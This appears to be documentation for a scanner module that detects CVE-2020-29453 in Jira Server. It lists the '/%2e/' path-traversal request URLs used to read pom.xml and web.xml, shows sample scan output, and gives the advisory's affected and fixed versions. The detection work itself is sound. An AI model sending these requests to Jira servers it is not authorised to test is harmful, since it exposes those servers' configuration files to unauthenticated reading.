CVE-2020-29453

Category: [Info Disclosure]

module name: check_cve_2020_29453

Checks for urls:

    # {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml",
    # {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml",
    # {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml"

This adds the /%2e/ and that is the only difference between the check for this CVE and CVE-2019-8442

INFO: Checking for CVE-2020-29453

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
- HTTP Status Code: 404
- No vulnerability detected at https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 404
- No vulnerability detected at https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml

Reference: https://jira.atlassian.com/browse/JRASERVER-72014

Description

The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.

Affected versions:

• version < 8.5.11
• 8.6.0 ≤ version < 8.13.3
• 8.14.0 ≤ version < 8.15.0

Fixed versions:

• 8.5.11
• 8.13.3
• 8.15.0